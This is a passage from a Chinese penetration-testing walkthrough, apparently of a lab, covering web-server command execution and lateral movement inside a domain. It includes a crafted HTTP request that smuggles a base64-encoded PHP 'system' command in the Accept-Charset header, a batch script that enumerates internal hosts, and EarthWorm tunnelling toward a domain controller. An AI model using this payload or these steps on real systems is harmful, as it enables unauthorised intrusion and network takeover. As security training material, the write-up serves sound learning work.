主页 > 网络知识 > 渗透贯穿始终中篇(5)

渗透贯穿始终中篇(5)

20201122211407973.png

20201122211436381.png

构造payload

注: Accept-Encoding要把gzip, deflate 里逗号后面的空格去掉,不然命令执行不成功

Accept-Charset 的值就是执行的命令, 需要进行base64编码

GET / HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Connection: close accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7 Accept-Encoding: gzip,deflate Upgrade-Insecure-Requests: 1

20201122213320139.png

漫游内网 内网信息收集

远程win7使用nbtscan扫描内网存活IP

20201123092609908.png

20201123092656754.png

ping批量测试ip

@echo off setlocal ENABLEDELAYEDEXPANSION @FOR /F "usebackq eol=- skip=1 delims=\" %%j IN (`net view ^| find "命令成功完成" /v ^|find "The command completed successfully." /v`) DO ( @FOR /F "usebackq delims=" %%i IN (`@ping -n 1 -4 %%j ^| findstr "Pinging"`) DO ( @FOR /F "usebackq tokens=2 delims=[]" %%k IN (`echo %%i`) DO (echo %%k  %%j) ) )


获取当前计算机名称

2020112309301320.png

查看所有域

20201123093150919.png

win7ping win2012

20201123095758633.png

横向移动

查看win2008系统【192.168.1.18】

查看域控win2012【192.168.1.21】

隧道应用 搭建隧道连接域控环境

EarthWorm,(简称EW)是一套轻量便携且功能强大的网络穿透工具,基于标准C开发;具有socks5代理、端口转发和端口映射三大功能;支持跨平台

20201123100449116.png

利用攻击机器kali[192.168.28.130]穿透win2008,远程控制win2008

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!

您可能还会对这些文章感兴趣!